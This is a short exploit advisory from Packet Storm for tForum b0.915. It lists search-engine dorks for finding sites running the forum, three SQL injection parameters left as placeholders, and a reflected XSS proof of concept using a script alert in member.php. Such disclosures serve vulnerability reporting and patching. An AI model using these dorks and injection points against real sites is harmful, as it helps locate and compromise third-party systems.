tForum version b0.915 suffers from cross site scripting and remote SQL injection vulnerabilities.
ab9dc74bce79ff1eb08653d7dcd4003f8ffe2590b8c952360aa035a7c732ebb9# Exploit Title: tForum b0.915 Vulnerabilities
# Dork: intext:"powered by tForum b0.915"
# Author: snup
# Contact: snup.php@gmail.com
SQL Injection:
DORK:
inurl:"viewtopic.php?TopicID=" intext:"powered by tForum b0.915"
inurl:"viewboard.php?BoardID=" intext:"powered by tForum b0.915"
inurl:"viewcat.php?CatID=" intext:"powered by tForum b0.915"
BUG:
http://127.0.0.1/viewtopic.php?TopicID=[sqli]
http://127.0.0.1/viewboard.php?BoardID=[sqli]
http://127.0.0.1/viewcat.php?CatID=[sqli]
XSS:
DORK:
inurl:"username=" intext:"powered by tForum b0.915"
BUG:
http://127.0.0.1/member.php?Action=viewprofile&username=<script>alert(1337)</script>
===========
= Gr33tz: =
====================================================
= agilob, cOnd, czoik, drummachina, gocys, prick =
= im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom =
= irc.freenode.net #pakamera =
====================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed